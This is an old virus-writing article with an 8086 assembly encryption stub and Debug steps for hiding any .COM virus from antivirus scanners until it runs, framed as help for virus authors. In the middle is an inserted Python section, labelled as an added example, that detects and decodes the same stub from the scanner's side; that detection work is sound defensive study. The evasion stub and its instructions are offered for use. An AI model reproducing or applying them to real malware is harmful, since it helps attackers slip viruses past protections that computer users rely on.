Protecting Your Virus from Evil Detectors

by Dr. Bloodmoney

Before learning assembler, I found the subject of virii to be about the most boring subject I could think of.  But it caught my attention when I started to think about how I could sneak a virus (any virus) by a scanning program such as McAfee's.  Here is a simple piece of code I came up with that can be attached to any virus that has been written in assembly language (in the .COM format).  It allows you to encrypt a virus until runtime (i.e. until it is too late).

Add the following code to the virus of your choice at the beginning of the program:

encryption_code:
  mov bx,offset start_of_virus
encryption_loop:
  mov ah,[bx]               ;Take first byte of virus and put in AH
  sub ah,01                 ;This can be any integer up to FF
  mov [bx],ah               ;Move changed byte back into virus code
  inc bx                    ;Move to next byte of virus
  cmp bx,offset end_virus   ;Are we done yet?
  jb encryption_loop        ;Nope, keep going
  nop                       ;Breakpoint for Debug
start_of_virus:
  '
  '
  '                         ;Viral code
  '
end_virus:
  nop                       ;Add this label and NOP to the end of the virus
  code end
end encryption_code

After you compile the virus into .COM format, take it into Debug.

C:\> debug virus.com

Use the "R" command to get your registers.  Take particular note of CX.  After the virus has been encrypted the actual size of the file might be different from CX.  This is why we placed the NOP at the end of the file.

Now run the program setting a breakpoint at the first NOP (i.e. G 0111).  This will just run the encryption portion of the code and exit back to Debug.

Unassemble the code with "U" to verify that the virus has been encrypted.  You should notice a big change at this point.

Restore all registers to their original values, but first find the address of the NOP we placed at the end of the file.  Put its address into CX.

Finally, change the "sub ah,01" in encryption_code: to "add ah,01".

Save the file ("W") and exit ("Q").

You now have a virus that will avoid detection until runtime.  When run, the "add ah,01" restores the original viral code, putting it into action.
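Seen from the scanner's side, the stub above is a fixed byte sequence with one constant in it, and a scanner can undo it the same way the program does: find the loop, read the key and the start/end addresses out of it, and run the loop once over the stored bytes before matching signatures.  The following Python is an added example, not code from the article; the opcode encodings are the standard 8086 ones for the instructions as listed, it assumes the stub is assembled exactly as shown at offset 100h of a .COM file, and it also accepts the sub and xor variants of the loop.  The sample image is constructed for this example.

```python
import struct

ORG = 0x100  # .COM images load at CS:0100h, so file offset = address - ORG

# Opcode bytes of the article's stub; its layout is fixed, so every field
# sits at a known file offset (the Debug address minus 100h).
MOV_BX_IMM16 = b"\xBB"      # 0100: mov bx,imm16
MOV_AH_MEMBX = b"\x8A\x27"  # 0103: mov ah,[bx]
ARITH_AH = {b"\x80\xC4": "add", b"\x80\xEC": "sub", b"\x80\xF4": "xor"}  # 0105: op ah,imm8
MOV_MEMBX_AH_INC_BX = b"\x88\x27\x43"  # 0108: mov [bx],ah ; inc bx
CMP_BX_IMM16 = b"\x81\xFB"  # 010B: cmp bx,imm16
JB_REL8 = b"\x72"           # 010F: jb rel8

def find_stub(image):
    """Match the constant-byte loop at the entry point of a .COM image (bytes).
    Returns (op, key, start, end) with start/end as file offsets, or None."""
    if len(image) < 17 or image[0:1] != MOV_BX_IMM16 or image[3:5] != MOV_AH_MEMBX:
        return None
    op = ARITH_AH.get(bytes(image[5:7]))
    if op is None or image[8:11] != MOV_MEMBX_AH_INC_BX or image[11:13] != CMP_BX_IMM16:
        return None
    start = struct.unpack_from("<H", image, 1)[0]   # offset start_of_virus
    end = struct.unpack_from("<H", image, 13)[0]    # offset end_virus
    if image[15:16] != JB_REL8 or not (ORG <= start < end <= ORG + len(image)):
        return None
    return op, image[7], start - ORG, end - ORG

def reveal(image):
    """Emulate one pass of the stub's loop over [start, end): the result is the
    image as it sits in memory after the stub runs, with the body restored."""
    info = find_stub(image)
    if info is None:
        return None
    op, key, start, end = info
    step = {"add": lambda b: (b + key) & 0xFF, "sub": lambda b: (b - key) & 0xFF,
            "xor": lambda b: b ^ key}[op]
    return image[:start] + bytes(step(b) for b in image[start:end]) + image[end:]

# Constructed sample (not from the article): the stub after the sub->add swap,
# the NOP at 0111h, a six-byte body stored with 1 subtracted from every byte
# (plaintext is the ASCII marker "SAMPLE"), and the trailing NOP.
SAMPLE_COM = bytes.fromhex(
    "BB1201 8A27 80C401 8827 43 81FB1801 72F2 90"  # start=0112h, end=0118h
    "52404C4F4B44"                                 # "SAMPLE" with 1 subtracted
    "90"                                           # end_virus: nop
)
```

The revealed image is what a signature should be matched against; the stored file never contains the body's real bytes, which is exactly the gap the article relies on.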

I hope you gained something from this article.  I realize not everyone is familiar with assembler, but I hope I presented the material in a fashion that everyone could understand.
